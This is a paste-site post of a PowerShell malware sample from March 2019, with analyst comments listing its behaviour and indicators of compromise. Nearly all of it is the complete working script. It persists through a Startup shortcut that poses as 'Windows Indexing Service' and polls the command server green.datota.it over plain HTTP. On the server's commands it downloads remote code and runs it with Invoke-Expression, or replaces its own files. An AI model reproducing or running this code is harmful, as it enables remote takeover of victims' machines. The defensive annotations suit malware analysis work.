James_inthe_box

Cleaned

Mar 28th, 2019
  1. <# NOTE(review): the leading "1." is the paste site's line-number gutter, not script text.

  Analyst annotations (comments only; the script text below is unchanged apart from line breaks).

  What the visible code does:
    - Builds a host identifier from the computer name, model and disk signatures (CreateID).
    - Persists through a Startup-folder shortcut that runs cscript.exe against a .js file
      stored in the user's temp directory (CreateShortcut plus the $lnk / $JS_file values).
    - Polls $url_adm over plain HTTP roughly every $timeout (120) seconds, sending the host
      identifier and version values as query-string parameters b, os, v and psver.
    - Treats the response as a '|'-separated command: 'm1' and 'm' download further script
      text and pass it to Invoke-Expression (iex); 'u' replaces the on-disk .txt and .js
      files and relaunches; anything else sleeps.

  Artifacts a defender can search for, all taken from the literals below:
    - Startup-folder item 'Windows Indexing Service SearchI32.lnk' with target cscript.exe.
    - SearchI32.js / SearchI32.txt / SearchI32.tmp and a file named '1' in the temp directory.
    - HTTP requests to the $url_adm host carrying the b / os / v / psver parameters.
    - PowerShell script-block logging, where enabled, should record the text handed to iex.
#>

# Creates a .lnk at $lnk whose target is always cscript.exe, with $Arguments as its argument
# string and $WorkingDirectory as its start directory. The description text imitates a
# Windows component name. Returns a status string instead of throwing.
Function CreateShortcut( $lnk, $Arguments, $WorkingDirectory ){
  try{
    $Shell = New-Object -ComObject ('WScript.Shell');
    $ShortCut = $Shell.CreateShortcut( $lnk );
    $ShortCut.Arguments= $Arguments;
    $ShortCut.TargetPath = 'cscript.exe';
    $ShortCut.WorkingDirectory = $WorkingDirectory;
    $ShortCut.WindowStyle = 1;
    $ShortCut.Description = 'Windows Indexing Service';
    $ShortCut.Save();
    Return 'CreateShortcut -> ok';
  }catch{
    Return 'CreateShortcut -> fail';
  }
}

# Builds the per-host identifier: <computer name>_<model>_<disk signatures in hex>.
# Each WMI query has its own fallback ('OMG_' or '0000000'), so an identifier is always returned.
Function CreateID {
  $a = '';
  try{
    $a = (Get-WmiObject -class Win32_ComputerSystem -Property Name).Name.trim() + '_';
  }catch{
    $a = 'OMG_';
  }
  try{
    $a += (Get-WmiObject -class Win32_ComputerSystem -Property Model).Model.trim() + '_';
  }catch{
    $a += 'OMG_';
  }
  try{
    # Appends the signature of every disk drive, base 16, with no separator between drives.
    foreach ($disk in (gwmi win32_diskdrive)) {
      $a += [convert]::tostring($disk.signature, 16);
    }
  }catch{
    $a += '0000000';
  }
  Return $a;
}

# --- Configuration and derived paths ---
$ver = "327.2";                        # version string reported to the server as 'v'
$url_adm = 'http://green.datota.it/';  # polling endpoint; plain HTTP, so requests are visible to network monitoring
$bot_id = CreateID;
try{
  # Despite the variable name, the value read here is the PowerShell BuildVersion string.
  $bot_os = [string]$PSVersionTable.BuildVersion;
}catch{
  $bot_os = "undefined";
}
$timeout = 120;                        # base sleep interval in seconds
# $logs only accumulates locally; nothing in the visible code sends it anywhere.
$logs = @([string]( $(get-date) ));
$psver = ( (Get-Host).Version ).Major;
$my_dir = [System.IO.Path]::GetTempPath();
$ldr = 'SearchI32';
$stop_id = Join-Path $my_dir '1';      # presence of this file makes the polling loop exit
# $exe_file is assigned but never referenced again in the visible code.
$exe_file = Join-Path $my_dir 'SearchI32.exe';
$ldr_file = Join-Path $my_dir 'SearchI32.txt';
$JS_file = Join-Path $my_dir 'SearchI32.js';
$runfile = Join-Path $my_dir 'SearchI32.tmp';   # heartbeat file, rewritten on every loop pass
$lnk = [Environment]::GetFolderPath('Startup') + '\Windows Indexing Service '+$ldr+'.lnk';

# If the heartbeat file was written less than 3 * $timeout (360) seconds ago, wait
# 3 * $timeout + 10 seconds, launch the .js file through its file association and exit.
# Presumably this keeps two copies from polling at once - confirm against the .js stage.
if( test-path -path $runfile ){
  if ( ($(Get-Date) - $(Get-Item -path $runfile).LastWriteTime).TotalSeconds -lt ($timeout * 3) ){
    Start-Sleep -Seconds (3 * $timeout + 10 );
    Start-Process $JS_file;
    exit;
  }
}

# Persistence: create the Startup shortcut (cscript.exe <temp>\SearchI32.js) if it is missing.
if( ![System.IO.File]::Exists( $lnk ) ){
  $logs += CreateShortcut $lnk $JS_file $my_dir;
}else{
  $logs += $lnk;
}

# One WebClient is reused for every request, so each download below carries the same
# b / os / v / psver query-string parameters.
$req = New-Object System.Net.WebClient;
# NOTE(review): DefaultCredentials are the logged-on user's credentials; they would be
# offered if the server answers with an integrated-authentication challenge.
$req.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$req.QueryString.Add('b', $bot_id );
$req.QueryString.Add('os', $bot_os );
$req.QueryString.Add('v', $ver );
$req.QueryString.Add('psver', $psver );

# A stop marker left over from an earlier run is renamed to 'test' before polling starts.
if( test-path -path $stop_id ){
  rename-item -path $stop_id 'test';
}

# --- Polling loop ---
$count = 0;
while ($count -le 1) {
  Get-Date | out-file $runfile;   # refresh the heartbeat timestamp
  if ( test-path -path $stop_id ){
    # The stop marker appeared while running: terminate. The assignment is moot because of exit.
    $count = 2;
    exit;
  }else{
    try{
      # Response format: <command>|<argument>[|<argument>]
      $action = $req.DownloadString( $url_adm ).Split('|');
    }catch{
      # Any request failure is treated as command 'w', which falls through to the default sleep.
      $action = 'w|'.Split('|');
    }
    switch ( $action[0] ) {
      # 'm1': download text from the URL in $action[1] and execute it with Invoke-Expression.
      # Errors are swallowed, and there is no sleep on this path before the next poll.
      'm1' {
        try{ iex -Command $req.DownloadString( $action[1] ); }catch{}
        break;
      }
      # 'm': $action[1] returns a '|'-separated list of URLs; each one is downloaded and executed.
      'm' {
        try{ $req.DownloadString( $action[1] ).Split('|') | foreach { iex -Command $req.DownloadString( $_); }; }catch{}
        break;
      }
      # 'u': delete the heartbeat file, overwrite SearchI32.txt from $action[1] and SearchI32.js
      # from $action[2], wait, relaunch the .js and exit. The .js is what the Startup shortcut
      # runs; the role of the .txt file is not shown in this script.
      'u' {
        try{
          try{ Remove-Item -Path $runfile; }catch{}
          $req.DownloadFile($action[1], $ldr_file );
          $req.DownloadFile($action[2], $JS_file );
          $count = 2;
          Start-Sleep -Seconds $timeout;
          Start-Process $JS_file;
          exit;
        }catch{
          Start-Sleep -Seconds $timeout;
        }
        break;
      }
      # Any other command, including the 'w' fallback: sleep for $timeout seconds and poll again.
      default{
        Start-Sleep -Seconds $timeout;
        break;
      }
    }
  }
# NOTE(review): the trailing "vh" after the closing brace is kept as found; it looks like
# paste or extraction residue rather than script content - confirm against the original sample.
}vh